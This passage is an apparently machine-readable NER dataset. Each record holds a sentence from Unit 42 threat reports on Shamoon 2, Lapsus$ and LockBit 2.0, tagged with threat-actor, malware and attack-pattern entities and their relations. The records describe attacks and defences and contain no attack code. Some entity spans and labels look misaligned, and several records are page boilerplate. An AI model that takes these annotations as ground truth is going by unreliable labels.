theft.","entities":[{"id":47748,"label":"attack-pattern","start_offset":22,"end_offset":38}],"relations":[],"Comments":[]} -{"id":2555,"text":" Credential theft has been known to be a key part of the Shamoon 2 attacks.","entities":[{"id":47749,"label":"attack-pattern","start_offset":1,"end_offset":17},{"id":47750,"label":"threat-actor","start_offset":57,"end_offset":66}],"relations":[{"id":348,"from_id":47750,"to_id":47749,"type":"uses"}],"Comments":[]} -{"id":2556,"text":"What our research is showing that’s new is how the attackers use the credentials once they’ve breached the network.","entities":[],"relations":[],"Comments":[]} -{"id":2557,"text":" And from this we can see how credential theft is the keystone of Shamoon 2 attacks; if an organization can prevent credential theft, the Shamoon 2 attacks can’t succeed.","entities":[{"id":47751,"label":"attack-pattern","start_offset":30,"end_offset":46},{"id":47753,"label":"attack-pattern","start_offset":116,"end_offset":132},{"id":47752,"label":"threat-actor","start_offset":66,"end_offset":75},{"id":47754,"label":"threat-actor","start_offset":138,"end_offset":147}],"relations":[{"id":346,"from_id":47752,"to_id":47751,"type":"uses"},{"id":347,"from_id":47754,"to_id":47753,"type":"uses"}],"Comments":[]} -{"id":2558,"text":" In our research, we’re able to outline that Shamoon 2 enters and spreads through an organization in three stages: These stages are outlined in the image below. And that credential theft is a key element in each stage: It’s also worth noting that credentials are a keystone issue in Shamoon 2 wave 2 too: we saw evidence of targeting an organization’s virtual desktop infrastructure (VDI) solutions with default credentials.","entities":[{"id":47755,"label":"threat-actor","start_offset":45,"end_offset":54},{"id":47758,"label":"campaign","start_offset":286,"end_offset":302},{"id":47756,"label":"attack-pattern","start_offset":172,"end_offset":188}],"relations":[{"id":349,"from_id":47758,"to_id":47756,"type":"uses"}],"Comments":[]} -{"id":2559,"text":"While not stolen credentials, the effect is the same: attackers can use those credentials to abuse otherwise legitimate access and privileges to carry out their attacks.","entities":[],"relations":[],"Comments":[]} -{"id":2560,"text":" At this time, we do not have research that explains definitively how the Shamoon 2 attackers have obtained these credentials.","entities":[{"id":47759,"label":"threat-actor","start_offset":74,"end_offset":83}],"relations":[],"Comments":[]} -{"id":2561,"text":"We do believe there is evidence suggestive of a connection between Shamoon 2 and the Magic Hound campaign, which could indicate these two attack campaigns could have worked in conjunction with each other to execute the Shamoon 2 attacks.","entities":[{"id":47761,"label":"campaign","start_offset":85,"end_offset":105},{"id":47760,"label":"campaign","start_offset":67,"end_offset":76},{"id":47762,"label":"campaign","start_offset":219,"end_offset":228}],"relations":[{"id":350,"from_id":47761,"to_id":47760,"type":"related-to"}],"Comments":[]} -{"id":2562,"text":" We also believe the presence of specific, valid named hosts from the network used in Stage 2 shows they were obtained directly from Active Directory on a domain controller.","entities":[{"id":47763,"label":"SOFTWARE","start_offset":133,"end_offset":149}],"relations":[],"Comments":[]} -{"id":2563,"text":"This is also suggestive of access to the network through legitimate, stolen credentials.","entities":[],"relations":[],"Comments":[]} -{"id":2564,"text":"In one sample we examined, we found a total of 844 hostnames.","entities":[],"relations":[],"Comments":[]} -{"id":2565,"text":" This also helps to set context for how widely Disttrack can attempt to spread: 844 systems, each attempting to spread to 256, means that from one distribution server, Shamoon 2 attackers could potentially try to spread Disttrack to 216,064 systems; and that’s not counting if any of those infected systems, in turn, attempts to spread to an additional 256 systems.","entities":[{"id":45593,"label":"threat-actor","start_offset":168,"end_offset":177},{"id":45594,"label":"malware","start_offset":47,"end_offset":56},{"id":45595,"label":"malware","start_offset":220,"end_offset":229}],"relations":[],"Comments":[]} -{"id":2566,"text":" Shamoon 2 attacks are very targeted to a specific region.","entities":[{"id":47764,"label":"threat-actor","start_offset":1,"end_offset":10}],"relations":[],"Comments":[]} -{"id":2567,"text":"But it would be a mistake to write-off the threat that Shamoon 2 demonstrates.","entities":[{"id":47765,"label":"threat-actor","start_offset":55,"end_offset":64}],"relations":[],"Comments":[]} -{"id":2568,"text":"Shamoon 2 attackers are using a rudimentary, but effective, distribution system of their own making.","entities":[{"id":45596,"label":"threat-actor","start_offset":0,"end_offset":9}],"relations":[],"Comments":[]} -{"id":2569,"text":"The power of their attack doesn’t lie in the tools they use but in their ability to obtain and abuse legitimate credentials.","entities":[{"id":47766,"label":"attack-pattern","start_offset":84,"end_offset":123}],"relations":[],"Comments":[]} -{"id":2570,"text":" This underscores why credential theft is something that organizations should prioritize as a top threat and take steps to understand it and prevent it.","entities":[{"id":47767,"label":"attack-pattern","start_offset":22,"end_offset":38}],"relations":[],"Comments":[]} -{"id":2571,"text":"We’ve recently published a new Unit 42 white paper on credential theft that we encourage you to read.","entities":[{"id":45597,"label":"identity","start_offset":31,"end_offset":38},{"id":45598,"label":"attack-pattern","start_offset":54,"end_offset":70}],"relations":[],"Comments":[]} -{"id":2572,"text":"To help customers take steps to better understand and protect against this threat, we’ve posted information in our article PAN-OS Configuration Recommendations to Protect Against Shamoon 2 located in our Threat and Vulnerability Articles section on our Live Community.","entities":[{"id":47768,"label":"threat-actor","start_offset":179,"end_offset":188}],"relations":[],"Comments":[]} -{"id":2573,"text":"You can also join in the discussion in our “About Threat and Vulnerability Discussions” on the Live Community.","entities":[],"relations":[],"Comments":[]} -{"id":2574,"text":" Ignite ’17 Security Conference: Vancouver, BC June 12–15, 2017 Ignite ’17 Security Conference is a live, four-day conference designed for today’s security professionals.","entities":[{"id":45599,"label":"TIME","start_offset":47,"end_offset":63},{"id":45600,"label":"location","start_offset":33,"end_offset":46}],"relations":[],"Comments":[]} -{"id":2575,"text":"Hear from innovators and experts, gain real-world skills through hands-on sessions and interactive workshops, and find out how breach prevention is changing the security industry.","entities":[],"relations":[],"Comments":[]} -{"id":2576,"text":"Visit the Ignite website for more information on tracks, workshops and marquee sessions.","entities":[],"relations":[],"Comments":[]} -{"id":2577,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} -{"id":2578,"text":" Please mark, I'm not a robot!","entities":[],"relations":[],"Comments":[]} -{"id":2579,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} -{"id":2580,"text":"This post is also available in: 日本語 (Japanese) The Lapsus$ Group threat actor has grown in just a few months from launching a handful of destructive attacks to stealing and publishing source code of multiple top-tier technology companies.","entities":[{"id":45601,"label":"threat-actor","start_offset":57,"end_offset":64}],"relations":[],"Comments":[]} -{"id":2581,"text":"Though sometimes called a ransomware group in reports, Lapsus$ is notable for not deploying ransomware in extortion attempts.","entities":[{"id":7789,"label":"threat-actor","start_offset":55,"end_offset":62}],"relations":[],"Comments":[]} -{"id":2582,"text":"In today’s environment, threat actors favor using ransomware to encrypt data and systems and often extort victims for significant amounts of cryptocurrency in exchange for decryption keys, sometimes turning up the pressure with the threat of publishing stolen data.","entities":[],"relations":[],"Comments":[]} -{"id":2583,"text":"Lapsus$, however, is unusual in its approach – for this group, notoriety most often appears to be the goal, rather than financial gain.","entities":[{"id":45602,"label":"threat-actor","start_offset":0,"end_offset":7}],"relations":[],"Comments":[]} -{"id":2584,"text":" Unit 42 has helped organizations respond to multiple Lapsus$ attacks.","entities":[{"id":47769,"label":"identity","start_offset":1,"end_offset":8},{"id":7797,"label":"threat-actor","start_offset":54,"end_offset":61}],"relations":[],"Comments":[]} -{"id":2585,"text":"The Lapsus$ Group doesn’t employ malware in breached victim environments, doesn’t encrypt data and in most cases, doesn’t actually employ extortion.","entities":[{"id":47771,"label":"attack-pattern","start_offset":26,"end_offset":40},{"id":47770,"label":"threat-actor","start_offset":4,"end_offset":11}],"relations":[],"Comments":[]} -{"id":2586,"text":"They focus on using a combination of stolen credentials and social engineering to gain access to victims.","entities":[{"id":45603,"label":"attack-pattern","start_offset":37,"end_offset":55},{"id":45604,"label":"attack-pattern","start_offset":60,"end_offset":78}],"relations":[],"Comments":[]} -{"id":2587,"text":"We’ve also seen them solicit employees on Telegram for their login credentials at specific companies in industries including: telecom, software, gaming, hosting providers and call centers.","entities":[{"id":47772,"label":"SOFTWARE","start_offset":42,"end_offset":50}],"relations":[],"Comments":[]} -{"id":2588,"text":" However, the group’s attacks and leaking of stolen data even without extortion can be very damaging.","entities":[],"relations":[],"Comments":[]} -{"id":2589,"text":"In addition, we’ve seen destructive Lapsus$ attacks where the actors got access to an organization’s cloud environment, wiped systems and destroyed over a thousand virtual machines.","entities":[{"id":45605,"label":"threat-actor","start_offset":36,"end_offset":43}],"relations":[],"Comments":[]} -{"id":2590,"text":" Although there are no public indicators of compromise (IoCs), and no tactics, techniques and procedures (TTPs) that are unique to Lapsus$ Group, here we will summarize what is known of this threat actor to better enable defenders in understanding and mitigating this threat.","entities":[{"id":47773,"label":"threat-actor","start_offset":131,"end_offset":138}],"relations":[],"Comments":[]} -{"id":2591,"text":"Early Targets of Lapsus$ Evolution of Targeted Organizations Mitigation Actions Conclusion","entities":[{"id":7821,"label":"threat-actor","start_offset":17,"end_offset":24}],"relations":[],"Comments":[]} -{"id":2592,"text":"Additional Resources","entities":[],"relations":[],"Comments":[]} -{"id":2593,"text":" We first observed the “Lapsus$” handle mid-2021, but the first attack activity quoting that handle was in August 2021, with some U.K. mobile phone customers reporting receiving threatening texts (Figure 1).","entities":[{"id":47774,"label":"threat-actor","start_offset":24,"end_offset":31},{"id":47776,"label":"TIME","start_offset":107,"end_offset":118},{"id":47777,"label":"location","start_offset":130,"end_offset":134},{"id":47775,"label":"TIME","start_offset":40,"end_offset":48}],"relations":[],"Comments":[]} -{"id":2594,"text":"In December 2021, the Ministry of Health of Brazil fell victim to an attack claimed by Lapsus$ (Figure 2).","entities":[{"id":47778,"label":"TIME","start_offset":3,"end_offset":16},{"id":47780,"label":"threat-actor","start_offset":87,"end_offset":94},{"id":47779,"label":"identity","start_offset":22,"end_offset":50}],"relations":[{"id":351,"from_id":47780,"to_id":47779,"type":"targets"}],"Comments":[]} -{"id":2595,"text":"This included the soon-to-be de rigueur data exfiltration and deletion technique, and also redirection of some DNS records.","entities":[],"relations":[],"Comments":[]} -{"id":2596,"text":"This was followed in short order by attacks on South American telecoms providers Claro and Embratel, Brazilian state-owned postal service “Correios,” and Portuguese media giant Impresa.","entities":[{"id":47784,"label":"location","start_offset":101,"end_offset":110},{"id":47785,"label":"identity","start_offset":139,"end_offset":147},{"id":47786,"label":"location","start_offset":154,"end_offset":164},{"id":47781,"label":"location","start_offset":47,"end_offset":61},{"id":47783,"label":"identity","start_offset":91,"end_offset":99},{"id":47787,"label":"identity","start_offset":176,"end_offset":184},{"id":47782,"label":"identity","start_offset":81,"end_offset":86}],"relations":[{"id":352,"from_id":47787,"to_id":47786,"type":"located-at"},{"id":353,"from_id":47785,"to_id":47784,"type":"located-at"},{"id":354,"from_id":47782,"to_id":47781,"type":"located-at"},{"id":355,"from_id":47783,"to_id":47781,"type":"located-at"}],"Comments":[]} -{"id":2597,"text":"This initial focus has led to speculation that Lapsus$ Group may be Brazilian, although we understand the choice of targets to have been influenced by extended team members rather than the team leadership.","entities":[{"id":47788,"label":"threat-actor","start_offset":47,"end_offset":54},{"id":47789,"label":"location","start_offset":68,"end_offset":77}],"relations":[{"id":356,"from_id":47788,"to_id":47789,"type":"located-at"}],"Comments":[]} -{"id":2598,"text":" Apart from Argentinian eCommerce provider Mercado Libre \/ Mercado Pago, subsequent victimology has departed South America and pivoted to focus on the high-tech sector. Recent public victims have included: It should be understood that in addition there are likely any number of other victims, targeted by attacks not known in the public sphere.","entities":[{"id":45606,"label":"location","start_offset":12,"end_offset":23},{"id":45608,"label":"identity","start_offset":43,"end_offset":56},{"id":45609,"label":"identity","start_offset":59,"end_offset":71},{"id":45610,"label":"location","start_offset":109,"end_offset":122}],"relations":[{"id":357,"from_id":45608,"to_id":45606,"type":"located-at"},{"id":358,"from_id":45609,"to_id":45606,"type":"located-at"},{"id":359,"from_id":45609,"to_id":45608,"type":"related-to"}],"Comments":[]} -{"id":2599,"text":"It is likely that some victims are not the intended end-target, but are rather breached in order to gain access to their customers, or for example, to help bypass multi-factor authentication (MFA).","entities":[],"relations":[],"Comments":[]} -{"id":2600,"text":"To this end, we are aware of this actor’s involvement in vishing, SIM-swapping and soliciting third parties at providers for insider access.","entities":[],"relations":[],"Comments":[]} -{"id":2601,"text":"For example, in the “proof” of the Okta breach posted on the Lapsus$ Group’s Telegram channel, the actor states: “… our focus was ONLY on okta customers” (Figure 3)","entities":[{"id":45614,"label":"identity","start_offset":138,"end_offset":142},{"id":45611,"label":"identity","start_offset":35,"end_offset":39},{"id":45612,"label":"threat-actor","start_offset":61,"end_offset":68},{"id":45613,"label":"SOFTWARE","start_offset":77,"end_offset":85}],"relations":[{"id":360,"from_id":45612,"to_id":45611,"type":"targets"}],"Comments":[]} -{"id":2602,"text":"Several of the Lapsus$ Group’s attacks involved the theft and publication of source code.","entities":[{"id":47790,"label":"threat-actor","start_offset":15,"end_offset":22}],"relations":[],"Comments":[]} -{"id":2603,"text":"In the case of Nvidia, it was observed as a non-financial extortion attempt.","entities":[{"id":47791,"label":"identity","start_offset":15,"end_offset":21}],"relations":[],"Comments":[]} -{"id":2604,"text":"In other cases, for example that of Microsoft, there was simply publication without extortion, again supporting the understanding that the primary motivation of this actor is notoriety rather than financial gain.","entities":[{"id":45615,"label":"identity","start_offset":36,"end_offset":45}],"relations":[],"Comments":[]} -{"id":2605,"text":" However, as notoriety and success cause this group to grow, we should expect to see diversity of membership reflected in a diversity of victimology, TTPs and action-on-objective motivations.","entities":[],"relations":[],"Comments":[]} -{"id":2606,"text":" Owing to the diversity of techniques used, and the lack of use of malware, there is no single defense against or detection of Lapsus$ attacks specifically. ","entities":[{"id":7883,"label":"threat-actor","start_offset":127,"end_offset":134}],"relations":[],"Comments":[]} -{"id":2607,"text":"A hallmark of this group is the diversity of techniques used both for initial access and action-on-objective.","entities":[],"relations":[],"Comments":[]} -{"id":2608,"text":"Credentials are harvested from dumps, purchased or spear-phished.","entities":[],"relations":[],"Comments":[]} -{"id":2609,"text":"When employed, various techniques to bypass MFA are observed – from social engineering, through SIM-swapping and even compromising MFA\/telecoms providers. Zero Trust network architecture and strong security hygiene are the best defenses against this type of threat actor.","entities":[],"relations":[],"Comments":[]} -{"id":2610,"text":"If Lapsus$ has purchased credentials for a network, they can effectively operate as an insider threat, taking advantage of the same privileges the employee has inside the network. Focus on general information security best practices: MFA, access controls and network segmentation.","entities":[{"id":47792,"label":"threat-actor","start_offset":3,"end_offset":10}],"relations":[],"Comments":[]} -{"id":2611,"text":"Ensure your organization has the ability to detect anomalous activity, including activity that involves trusted third parties in your environments, and protect against non-technical techniques such as vishing and SIM-swapping.","entities":[],"relations":[],"Comments":[]} -{"id":2612,"text":"Patching of internal systems that might support lateral movement and privilege escalation should be prioritized, as well as against known public exploits that these actors might employ.","entities":[{"id":47793,"label":"attack-pattern","start_offset":69,"end_offset":89}],"relations":[],"Comments":[]} -{"id":2613,"text":" Although the commodity malware RedLine Stealer has been implicated for credential harvesting in some attacks, it’s unclear if this is first- or third-party, and it cannot be used as a definitive indicator of Lapsus$-specific activity.","entities":[{"id":45617,"label":"malware","start_offset":32,"end_offset":47},{"id":45618,"label":"attack-pattern","start_offset":72,"end_offset":93},{"id":45619,"label":"threat-actor","start_offset":209,"end_offset":216}],"relations":[{"id":109,"from_id":45618,"to_id":45617,"type":"delivers"}],"Comments":[]} -{"id":2614,"text":" Lapsus$ Group has made headlines recently for high-profile attacks, with an apparent goal of gaining notoriety.","entities":[{"id":47794,"label":"threat-actor","start_offset":1,"end_offset":8}],"relations":[],"Comments":[]} -{"id":2615,"text":"They claim in some cases to have targeted organizations with the specific goal of gaining access to customers.","entities":[],"relations":[],"Comments":[]} -{"id":2616,"text":" While referred to as a ransomware group in many reports, the Lapsus$ Group is more accurately called an attack group.","entities":[{"id":45620,"label":"threat-actor","start_offset":62,"end_offset":69}],"relations":[],"Comments":[]} -{"id":2617,"text":"Most notably, their focus to date does not appear to have been on extortion and financial gain.","entities":[],"relations":[],"Comments":[]} -{"id":2618,"text":"Even without extortion, the group’s attacks and leaks of stolen information can be damaging.","entities":[],"relations":[],"Comments":[]} -{"id":2619,"text":" Because the group uses a diversity of techniques for attacks, no single technique can protect against Lapsus$ or detect its attacks.","entities":[{"id":45621,"label":"threat-actor","start_offset":103,"end_offset":110}],"relations":[],"Comments":[]} -{"id":2620,"text":"Because of this, we recommend that organizations focus on observing general information security best practices as described in the Mitigation Actions section above.","entities":[],"relations":[],"Comments":[]} -{"id":2621,"text":" Unit 42, together with researchers at Unit 221b, identified the primary actor behind the Lapsus$ Group moniker in 2021, and have been assisting law enforcement in their efforts to prosecute this group.","entities":[{"id":47795,"label":"identity","start_offset":1,"end_offset":8},{"id":47796,"label":"identity","start_offset":39,"end_offset":48},{"id":47798,"label":"TIME","start_offset":115,"end_offset":119},{"id":47797,"label":"threat-actor","start_offset":90,"end_offset":97}],"relations":[],"Comments":[]} -{"id":2622,"text":" If you think you may be subject to an active attack or have an urgent matter, get in touch with the Unit 42 Incident Response team or call North America Toll-Free: 866.486.4842 (866.4.UNIT42), EMEA: +31.20.299.3130, APAC: +65.6983.8730, or Japan: +81.50.1790.0200.","entities":[{"id":45625,"label":"location","start_offset":241,"end_offset":246},{"id":45627,"label":"location","start_offset":217,"end_offset":221},{"id":45624,"label":"location","start_offset":140,"end_offset":153},{"id":45626,"label":"location","start_offset":194,"end_offset":198},{"id":45623,"label":"identity","start_offset":101,"end_offset":131}],"relations":[],"Comments":[]} -{"id":2623,"text":" Palo Alto Networks will update this Threat Brief with new information and recommendations as they become available. DEV-0537 criminal actor targeting organizations for data exfiltration and destruction A Closer Look","entities":[{"id":47799,"label":"identity","start_offset":1,"end_offset":19},{"id":47800,"label":"threat-actor","start_offset":118,"end_offset":126}],"relations":[],"Comments":[]} -{"id":2624,"text":"the","entities":[],"relations":[],"Comments":[]} -{"id":2625,"text":"LAPSUS$","entities":[{"id":45628,"label":"threat-actor","start_offset":0,"end_offset":7}],"relations":[],"Comments":[]} -{"id":2626,"text":"Data Extortion Group Lapsus$ Telegram channel: t[.]me\/minsaudebr","entities":[{"id":47801,"label":"URL","start_offset":47,"end_offset":64},{"id":7950,"label":"threat-actor","start_offset":21,"end_offset":28}],"relations":[],"Comments":[]} -{"id":2627,"text":"Email address associated with Lapsus$ Group: saudegroup[at]ctemplar[.]com Updated March 25, 2022, at 8:30 a.m. PT.","entities":[{"id":47803,"label":"EMAIL","start_offset":45,"end_offset":73},{"id":47802,"label":"TIME","start_offset":83,"end_offset":114},{"id":7951,"label":"threat-actor","start_offset":30,"end_offset":37}],"relations":[],"Comments":[]} -{"id":2628,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address! Please mark, I'm not a robot!","entities":[],"relations":[],"Comments":[]} -{"id":2629,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} -{"id":2630,"text":"This post is also available in: 日本語 (Japanese) LockBit 2.0 is ransomware as a service (RaaS) that first emerged in June 2021 as an upgrade to its predecessor LockBit (aka ABCD Ransomware), which was first observed in September 2019.","entities":[{"id":47805,"label":"TIME","start_offset":121,"end_offset":130},{"id":47806,"label":"malware","start_offset":164,"end_offset":171},{"id":47808,"label":"TIME","start_offset":223,"end_offset":237},{"id":47804,"label":"malware","start_offset":53,"end_offset":64},{"id":47807,"label":"malware","start_offset":177,"end_offset":192}],"relations":[{"id":361,"from_id":47804,"to_id":47806,"type":"variant-of"},{"id":363,"from_id":47807,"to_id":47806,"type":"duplicate-of"}],"Comments":[]} -{"id":2631,"text":"Since its inception, the LockBit 2.0 RaaS attracted affiliates via recruitment campaigns in underground forums, and thus became particularly prolific during the third quarter of calendar year 2021.","entities":[{"id":45629,"label":"malware","start_offset":25,"end_offset":36},{"id":45630,"label":"TIME","start_offset":192,"end_offset":196}],"relations":[],"Comments":[]} -{"id":2632,"text":"The LockBit 2.0 operators claimed to have the fastest encryption software of any active ransomware strain as of June 2021, claiming accordingly that this added to its effectiveness and ability to disrupt the ransomware landscape.","entities":[{"id":47809,"label":"TIME","start_offset":112,"end_offset":121},{"id":7968,"label":"threat-actor","start_offset":4,"end_offset":11}],"relations":[],"Comments":[]} -{"id":2633,"text":" While several top-tier RaaS affiliate programs, such as Babuk, DarkSide and REvil (aka Sodinokibi) disappeared from the underground in 2021, LockBit 2.0 continued to operate and gradually became one of the most active ransomware operations.","entities":[{"id":47813,"label":"threat-actor","start_offset":88,"end_offset":98},{"id":47810,"label":"threat-actor","start_offset":57,"end_offset":62},{"id":47811,"label":"threat-actor","start_offset":64,"end_offset":72},{"id":47812,"label":"threat-actor","start_offset":77,"end_offset":82},{"id":47814,"label":"TIME","start_offset":136,"end_offset":140},{"id":47815,"label":"malware","start_offset":142,"end_offset":153}],"relations":[{"id":364,"from_id":47813,"to_id":47812,"type":"variant-of"}],"Comments":[]} -{"id":2634,"text":"While Conti was recognized as being the most prolific ransomware deployed in 2021 per our 2022 Unit 42 Ransomware Threat Report, LockBit 2.0 is the most impactful and widely deployed ransomware variant we have observed in all ransomware breaches during the first quarter of 2022, considering both leak site data and data from cases handled by Unit 42 incident responders.","entities":[{"id":45633,"label":"TIME","start_offset":77,"end_offset":81},{"id":45632,"label":"identity","start_offset":95,"end_offset":102},{"id":45635,"label":"TIME","start_offset":90,"end_offset":94},{"id":45636,"label":"malware","start_offset":129,"end_offset":140},{"id":45637,"label":"TIME","start_offset":257,"end_offset":278},{"id":45631,"label":"threat-actor","start_offset":6,"end_offset":11},{"id":45638,"label":"identity","start_offset":343,"end_offset":350}],"relations":[],"Comments":[]} -{"id":2635,"text":" According to data analysis of ransomware groups’ dark web leak sites, LockBit 2.0 was the most impactful RaaS for five consecutive months.","entities":[{"id":47816,"label":"malware","start_offset":71,"end_offset":82}],"relations":[],"Comments":[]} -{"id":2636,"text":"As of May 25, LockBit 2.0 accounted for 46% of all ransomware-related breach events for 2022.","entities":[{"id":47817,"label":"TIME","start_offset":6,"end_offset":12},{"id":47818,"label":"malware","start_offset":14,"end_offset":25},{"id":47819,"label":"TIME","start_offset":88,"end_offset":92}],"relations":[],"Comments":[]} -{"id":2637,"text":"And the LockBit 2.0 RaaS leak site has the most significant number of published victims, with over 850 in total.","entities":[{"id":45639,"label":"threat-actor","start_offset":8,"end_offset":19}],"relations":[],"Comments":[]} -{"id":2638,"text":" Additionally, LockBit 2.0 has affected many companies globally, with top victims based in the U.S., Italy and Germany.","entities":[{"id":47820,"label":"malware","start_offset":15,"end_offset":26},{"id":47821,"label":"location","start_offset":95,"end_offset":99},{"id":47822,"label":"location","start_offset":101,"end_offset":106},{"id":47823,"label":"location","start_offset":111,"end_offset":118}],"relations":[],"Comments":[]} -{"id":2639,"text":"Its most highly targeted industry verticals include professional services, construction, wholesale and retail, and manufacturing.","entities":[],"relations":[],"Comments":[]} -{"id":2640,"text":" Palo Alto Networks customers receive protections against LockBit 2.0 attacks from Cortex XDR, as well as from the WildFire cloud-delivered security subscription for the Next-Generation Firewall.","entities":[{"id":47824,"label":"malware","start_offset":58,"end_offset":69},{"id":45640,"label":"identity","start_offset":1,"end_offset":19},{"id":45642,"label":"SOFTWARE","start_offset":83,"end_offset":93},{"id":45643,"label":"SOFTWARE","start_offset":115,"end_offset":123}],"relations":[],"Comments":[]} -{"id":2641,"text":"(Please see the Conclusion section for more detail.) LockBit 2.0 Overview Victimology Leak Site Data Unit 42 Incident Response Data on LockBit 2.0 LockBit 2.0 Tactics, Techniques and Procedures LockBit 2.0 Technical Details LockBit 3.0 Courses of Action Conclusion","entities":[{"id":47828,"label":"malware","start_offset":148,"end_offset":159},{"id":47825,"label":"malware","start_offset":54,"end_offset":65},{"id":47826,"label":"identity","start_offset":102,"end_offset":109},{"id":47827,"label":"malware","start_offset":136,"end_offset":147},{"id":47829,"label":"malware","start_offset":195,"end_offset":206},{"id":47830,"label":"malware","start_offset":225,"end_offset":236}],"relations":[],"Comments":[]} -{"id":2642,"text":"Appendix A Additional Resources","entities":[],"relations":[],"Comments":[]} -{"id":2643,"text":" LockBit 2.0 is another example of RaaS that leverages double extortion techniques as part of the attack to pressure victims into paying the ransom.","entities":[{"id":45644,"label":"malware","start_offset":1,"end_offset":12}],"relations":[],"Comments":[]} -{"id":2644,"text":" In some cases, LockBit 2.0 operators have performed DDoS attacks on the victims' infrastructure as well as using a leak site.","entities":[{"id":47831,"label":"malware","start_offset":16,"end_offset":27},{"id":47832,"label":"attack-pattern","start_offset":53,"end_offset":65}],"relations":[],"Comments":[]} -{"id":2645,"text":"This practice is known as triple extortion, a tactic observed in groups like BlackCat, Avaddon and SunCrypt in the past.","entities":[{"id":47833,"label":"threat-actor","start_offset":77,"end_offset":85},{"id":47834,"label":"threat-actor","start_offset":87,"end_offset":94},{"id":47835,"label":"threat-actor","start_offset":99,"end_offset":107}],"relations":[],"Comments":[]} -{"id":2646,"text":" Like other ransomware families such as BlackByte, LockBit 2.0 avoids systems that use Eastern European languages, including many written with Cyrillic alphabets.","entities":[{"id":45646,"label":"malware","start_offset":51,"end_offset":62},{"id":45645,"label":"malware","start_offset":40,"end_offset":49}],"relations":[],"Comments":[]} -{"id":2647,"text":" Unlike other RaaS programs that don't require the affiliates to be super technical or savvy, LockBit 2.0 operators allegedly only work with experienced penetration testers, especially those experienced with tools like Metasploit and Cobalt Strike.","entities":[{"id":47837,"label":"tools","start_offset":219,"end_offset":229},{"id":47838,"label":"tools","start_offset":234,"end_offset":247},{"id":47836,"label":"threat-actor","start_offset":94,"end_offset":105}],"relations":[],"Comments":[]} -{"id":2648,"text":"Affiliates are tasked with gaining initial access to the victim network, allowing LockBit 2.0 to conduct the rest of the attack.","entities":[{"id":47839,"label":"threat-actor","start_offset":82,"end_offset":93}],"relations":[],"Comments":[]} -{"id":2649,"text":" LockBit 2.0 has been observed changing infected computers’ backgrounds to a ransomware note.","entities":[{"id":45647,"label":"threat-actor","start_offset":1,"end_offset":12}],"relations":[],"Comments":[]} -{"id":2650,"text":"The ransomware note was also used to recruit insiders from victim organizations.","entities":[],"relations":[],"Comments":[]} -{"id":2651,"text":"The notes claimed the threat actors would pay “millions of dollars” to insiders who provided access to corporate networks or facilitated a ransomware infection by opening a phishing email and\/or launching a payload manually.","entities":[{"id":47840,"label":"attack-pattern","start_offset":173,"end_offset":187}],"relations":[],"Comments":[]} -{"id":2652,"text":"The threat actors also expressed interest in other access methods such as RDP, VPN and corporate email credentials.","entities":[{"id":47841,"label":"SOFTWARE","start_offset":74,"end_offset":77},{"id":47842,"label":"SOFTWARE","start_offset":79,"end_offset":82}],"relations":[],"Comments":[]} -{"id":2653,"text":"In exchange, they offer a cut of the paid ransom.","entities":[],"relations":[],"Comments":[]} -{"id":2654,"text":" LockBit 2.0 targets organizations opportunistically.","entities":[{"id":47843,"label":"threat-actor","start_offset":1,"end_offset":12}],"relations":[],"Comments":[]} -{"id":2655,"text":"The operators work with initial access brokers to save time and allow for a larger profit potential.","entities":[],"relations":[],"Comments":[]} -{"id":2656,"text":"While typically seeking victims of opportunity, LockBit 2.0 does appear to have victim limitations.","entities":[{"id":47844,"label":"threat-actor","start_offset":48,"end_offset":59}],"relations":[],"Comments":[]} -{"id":2657,"text":"The group announced that they would not target healthcare facilities, social services, educational institutions, charitable organizations and other organizations that “contribute to the survival of the human race”.","entities":[],"relations":[],"Comments":[]} -{"id":2658,"text":"However, despite these claims, there have been instances of affiliates undermining these guidelines by still opting to attack industry verticals such as healthcare and education.","entities":[],"relations":[],"Comments":[]} -{"id":2659,"text":" Organizations in Europe and the U.S. are hit more often by LockBit 2.0 than those in other countries, likely due to the high profitability and insurance payouts.","entities":[{"id":47846,"label":"location","start_offset":33,"end_offset":37},{"id":47847,"label":"threat-actor","start_offset":60,"end_offset":71},{"id":47845,"label":"location","start_offset":18,"end_offset":24}],"relations":[],"Comments":[]} -{"id":2660,"text":" During the first calendar year quarter of 2022, LockBit 2.0 persisted as the most impactful and the most deployed ransomware variant we observed in all ransomware breaches shared on leak sites.","entities":[{"id":47849,"label":"threat-actor","start_offset":49,"end_offset":60},{"id":47848,"label":"TIME","start_offset":12,"end_offset":47}],"relations":[],"Comments":[]} -{"id":2661,"text":" According to leak site data analysis, LockBit 2.0 was the most impactful RaaS for five consecutive months.","entities":[{"id":45651,"label":"threat-actor","start_offset":39,"end_offset":50}],"relations":[],"Comments":[]} -{"id":2662,"text":"As of May 25, LockBit 2.0 accounted for 46% of all ransomware-related breach events for 2022 shared on leak sites.","entities":[{"id":47850,"label":"TIME","start_offset":6,"end_offset":12},{"id":47851,"label":"threat-actor","start_offset":14,"end_offset":25},{"id":47852,"label":"TIME","start_offset":88,"end_offset":92}],"relations":[],"Comments":[]} -{"id":2663,"text":" Additionally, the LockBit 2.0 RaaS leak site has the most significant number of published victims, with over 850 in total.","entities":[{"id":47853,"label":"threat-actor","start_offset":19,"end_offset":30}],"relations":[],"Comments":[]} -{"id":2664,"text":"The site itself typically features information such as victim domains, a time tracker and measures of how much data was compromised.","entities":[],"relations":[],"Comments":[]} -{"id":2665,"text":" LockBit 2.0 claims that they have demanded ransom from at least 12,125 companies, as shown in the figure below.","entities":[{"id":47854,"label":"threat-actor","start_offset":1,"end_offset":12}],"relations":[],"Comments":[]} -{"id":2666,"text":" According to leak site data for LockBit 2.0, since its inception in June 2021, the RaaS has affected many companies globally, with top victims based in the U.S., Italy and Germany. LockBit 2.0 has also impacted various victims across multiple industry verticals.","entities":[{"id":47855,"label":"threat-actor","start_offset":33,"end_offset":44},{"id":47858,"label":"location","start_offset":163,"end_offset":168},{"id":47860,"label":"threat-actor","start_offset":183,"end_offset":194},{"id":47856,"label":"TIME","start_offset":69,"end_offset":78},{"id":47857,"label":"location","start_offset":157,"end_offset":161},{"id":47859,"label":"location","start_offset":173,"end_offset":180}],"relations":[],"Comments":[]} 